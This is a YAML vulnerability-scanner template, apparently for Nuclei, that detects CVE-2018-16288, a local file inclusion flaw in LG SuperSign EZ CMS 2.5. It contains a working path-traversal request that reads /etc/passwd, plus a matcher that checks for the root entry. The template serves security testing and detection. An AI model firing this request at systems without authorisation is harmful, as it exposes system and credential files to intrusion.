37 lines
1001 B
YAML
37 lines
1001 B
YAML
id: CVE-2018-16288
|
|
|
|
info:
|
|
name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
|
|
author: daffainfo
|
|
severity: high
|
|
description: |
|
|
LG SuperSign CMS 2.5 allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs - aka local file inclusion.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/45440
|
|
- http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-16288
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
|
cvss-score: 8.6
|
|
cve-id: CVE-2018-16288
|
|
cwe-id: CWE-200
|
|
tags: cve,cve2018,lfi,supersign,edb
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/06/13
|